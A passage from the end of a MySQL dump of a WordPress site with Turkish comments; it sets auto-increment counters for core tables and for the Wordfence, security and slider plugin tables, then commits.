ALTER TABLE `zdenl_aiowps_permanent_block`
  MODIFY `id` bigint(20) NOT NULL AUTO_INCREMENT;

--
-- Tablo için AUTO_INCREMENT değeri `zdenl_commentmeta`
--
ALTER TABLE `zdenl_commentmeta`
  MODIFY `meta_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- Tablo için AUTO_INCREMENT değeri `zdenl_comments`
--
ALTER TABLE `zdenl_comments`
  MODIFY `comment_ID` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- Tablo için AUTO_INCREMENT değeri `zdenl_links`
--
ALTER TABLE `zdenl_links`
  MODIFY `link_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- Tablo için AUTO_INCREMENT değeri `zdenl_options`
--
ALTER TABLE `zdenl_options`
  MODIFY `option_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=73997;

--
-- Tablo için AUTO_INCREMENT değeri `zdenl_postmeta`
--
ALTER TABLE `zdenl_postmeta`
  MODIFY `meta_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4887;

--
-- Tablo için AUTO_INCREMENT değeri `zdenl_posts`
--
ALTER TABLE `zdenl_posts`
  MODIFY `ID` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=6558;

--
-- Tablo için AUTO_INCREMENT değeri `zdenl_revslider_css`
--
ALTER TABLE `zdenl_revslider_css`
  MODIFY `id` int(9) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=110;

--
-- Tablo için AUTO_INCREMENT değeri `zdenl_revslider_layer_animations`
--
ALTER TABLE `zdenl_revslider_layer_animations`
  MODIFY `id` int(9) NOT NULL AUTO_INCREMENT;

--
-- Tablo için AUTO_INCREMENT değeri `zdenl_revslider_navigations`
--
ALTER TABLE `zdenl_revslider_navigations`
  MODIFY `id` int(9) NOT NULL AUTO_INCREMENT;

--
-- Tablo için AUTO_INCREMENT değeri `zdenl_revslider_sliders`
--
ALTER TABLE `zdenl_revslider_sliders`
  MODIFY `id` int(9) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- Tablo için AUTO_INCREMENT değeri `zdenl_revslider_slides`
--
ALTER TABLE `zdenl_revslider_slides`
  MODIFY `id` int(9) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=6;

--
-- Tablo için AUTO_INCREMENT değeri `zdenl_revslider_static_slides`
--
ALTER TABLE `zdenl_revslider_static_slides`
  MODIFY `id` int(9) NOT NULL AUTO_INCREMENT;

--
-- Tablo için AUTO_INCREMENT değeri `zdenl_termmeta`
--
ALTER TABLE `zdenl_termmeta`
  MODIFY `meta_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- Tablo için AUTO_INCREMENT değeri `zdenl_terms`
--
ALTER TABLE `zdenl_terms`
  MODIFY `term_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=26;

--
-- Tablo için AUTO_INCREMENT değeri `zdenl_term_taxonomy`
--
ALTER TABLE `zdenl_term_taxonomy`
  MODIFY `term_taxonomy_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=26;

--
-- Tablo için AUTO_INCREMENT değeri `zdenl_usermeta`
--
ALTER TABLE `zdenl_usermeta`
  MODIFY `umeta_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=32;

--
-- Tablo için AUTO_INCREMENT değeri `zdenl_users`
--
ALTER TABLE `zdenl_users`
  MODIFY `ID` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- Tablo için AUTO_INCREMENT değeri `zdenl_wfblocks7`
--
ALTER TABLE `zdenl_wfblocks7`
  MODIFY `id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2424;

--
-- Tablo için AUTO_INCREMENT değeri `zdenl_wfhits`
--
ALTER TABLE `zdenl_wfhits`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5436;

--
-- Tablo için AUTO_INCREMENT değeri `zdenl_wfhoover`
--
ALTER TABLE `zdenl_wfhoover`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- Tablo için AUTO_INCREMENT değeri `zdenl_wfissues`
--
ALTER TABLE `zdenl_wfissues`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=384;

--
-- Tablo için AUTO_INCREMENT değeri `zdenl_wfknownfilelist`
--
ALTER TABLE `zdenl_wfknownfilelist`
  MODIFY `id` int(11) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5128;

--
-- Tablo için AUTO_INCREMENT değeri `zdenl_wflogins`
--
ALTER TABLE `zdenl_wflogins`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=539;

--
-- Tablo için AUTO_INCREMENT değeri `zdenl_wfls_2fa_secrets`
--
ALTER TABLE `zdenl_wfls_2fa_secrets`
  MODIFY `id` int(11) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- Tablo için AUTO_INCREMENT değeri `zdenl_wfpendingissues`
--
ALTER TABLE `zdenl_wfpendingissues`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- Tablo için AUTO_INCREMENT değeri `zdenl_wfsnipcache`
--
ALTER TABLE `zdenl_wfsnipcache`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- Tablo için AUTO_INCREMENT değeri `zdenl_wfstatus`
--
ALTER TABLE `zdenl_wfstatus`
  MODIFY `id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=13574;
COMMIT;

/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
